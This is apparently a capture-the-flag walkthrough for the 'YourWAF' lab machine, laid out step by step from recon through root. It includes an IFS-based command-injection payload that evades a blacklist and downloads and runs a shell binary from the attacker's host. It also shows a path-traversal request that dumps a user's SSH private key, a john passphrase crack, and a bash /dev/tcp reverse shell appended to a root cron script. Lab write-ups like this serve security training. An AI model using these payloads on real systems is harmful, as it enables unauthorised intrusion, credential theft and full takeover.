# Lab setup
Download: YourWAF
Network: NAT, target IP 192.168.1.131
# Penetration process
# Initial information gathering
```text
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 1c:ec:5c:5b:fd:fc:ba:f3:4c:1b:0b:70:e6:ef:bf:12 (ECDSA)
|_  256 26:18:c8:ec:34:aa:d5:b9:28:a1:e2:83:b0:d3:45:2e (ED25519)
80/tcp   open  http    Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: 403 Forbidden
3000/tcp open  http    Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
```
Port 80 answers 403 Forbidden when requested by IP; the site only responds to the right Host header, so add a hosts entry first:

```text
┌──(root㉿kali)-[~]
└─# echo '192.168.1.131 www.yourwaf.nyx' >> /etc/hosts
```
Virtual host enumeration

```text
┌──(root㉿kali)-[~]
└─# gobuster vhost -u http://yourwaf.nyx -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 --append-domain -t 30 --random-agent
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://yourwaf.nyx
[+] Method:          GET
[+] Threads:         30
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      Opera/6.0 (Windows XP; U) [de]
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: www.yourwaf.nyx Status: 200 [Size: 10722]
Found: maintenance.yourwaf.nyx Status: 200 [Size: 292]
```
Add maintenance.yourwaf.nyx to /etc/hosts as well.

The maintenance vhost has a command-injection (RCE) endpoint, but a blacklist in front of it rejects the usual payloads. The payload below contains no literal space at all: `IFS=]` tells the shell to split the unquoted expansions `$b`, `$c` and `$d` on `]` instead, so `wget]192.168.1.129:8000/shell]-P]/tmp` turns back into `wget 192.168.1.129:8000/shell -P /tmp` when `$b` is expanded. It fetches a prepared `shell` binary from the attacker's HTTP server on 192.168.1.129:8000, makes it executable and runs it:

```text
IFS=];b=wget]192.168.1.129:8000/shell]-P]/tmp;$b;IFS=];c=chmod]+x]/tmp/shell;$c;IFS=];d=/tmp/shell;$d
```

Start a listener, submit the payload, and the reverse shell comes back.
# Privilege escalation
# tester
Upload pspy32 and watch for a while; a root process shows up:

```text
2024/06/08 10:12:55 CMD: UID=0 PID=2874 | /bin/bash /opt/nodeapp/copylogs.sh
```

The script is not writable from the current shell, but the directory looks like the Node.js backend behind port 3000, so read server.js:
```javascript
const express = require('express')
const { exec } = require('child_process');
var path = require('path');

const app = express()
const port = 3000

// Hard-coded API token: anyone who can read this file has it
const apiToken = '8c2b6a304191b8e2d81aaa5d1131d83d';

function checkApiToken(req, res, next) {
    let sendApiToken = req.query["api-token"] ?? '';
    if (apiToken !== sendApiToken) {
        res.send("Unauthorized.")
        return;
    }
    next();
}

// No token check on this route: the ModSecurity audit log is exposed to everyone
app.use('/logs', (req, res) => {
    let path_to_file = __dirname + '/logs/modsec_audit.log'
    res.sendFile(path_to_file)
})

app.get('/', checkApiToken, (req, res) => {
    res.send('API de mantenimiento!');
})

app.get('/restart', checkApiToken, (req, res) => {
    exec('reboot', (error, stdout, stderr) => {
        if (error) {
            res.send(`exec error: ${error}`)
            return;
        }
        res.send('Restarting server...');
    });
})

app.get('/readfile', checkApiToken, (req, res) => {
    let file = req.query["file"] ?? '';
    if (file === '') {
        res.send('Error: need file')
        return;
    }
    // The only filter is a substring match on 'passwd'; every other path passes
    if (file.indexOf('passwd') !== -1) {
        res.send('ForbiddenError: Forbidden')
        return;
    }
    // User input is glued onto __dirname with no separator and no containment
    // check, so a value starting with '..' walks out of the application directory
    let path_to_file = __dirname + file
    res.sendFile(path.resolve(path_to_file))
})

app.listen(port, () => {
    console.log(`Example app listening on port ${port}`)
})
```
The file gives away the API token and a `/readfile` route whose only filter is a substring check for `passwd`; the `file` parameter is concatenated straight onto `__dirname`, so a value beginning with `..` reaches any path on the box. `/etc/passwd` shows a user `tester`, so read that user's SSH key:
```text
┌──(root㉿kali)-[~]
└─# curl 'http://192.168.1.131:3000/readfile?api-token=8c2b6a304191b8e2d81aaa5d1131d83d&file=../../..//home/tester/.ssh/id_rsa'
-----BEGIN OPENSSH PRIVATE KEY-----
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
NOmwKPWS5rqFofpdCmmz/n4nRNM=
-----END OPENSSH PRIVATE KEY-----
```
The key is encrypted, so crack the passphrase with john (`hash` is the key converted with `ssh2john`):

```text
┌──(root㉿kali)-[~]
└─# john --wordlist=/root/techyou.txt hash --format=SSH
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
wafako           (id_rsa)
1g 0:00:07:00 DONE (2024-06-08 04:41) 0.002375g/s 21.81p/s 21.81c/s 21.81C/s 111289..drogba
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

The passphrase is `wafako`. SSH in as tester with the key.
# root
`id` shows that tester is in the copylogs group, so the script run by the root cron job found earlier is now writable. Append a reverse shell to /opt/nodeapp/copylogs.sh:

```text
bash -c "bash -i >& /dev/tcp/192.168.1.129/8888 0>&1"
```

Start a listener on 8888, wait for the next run, and the root shell arrives.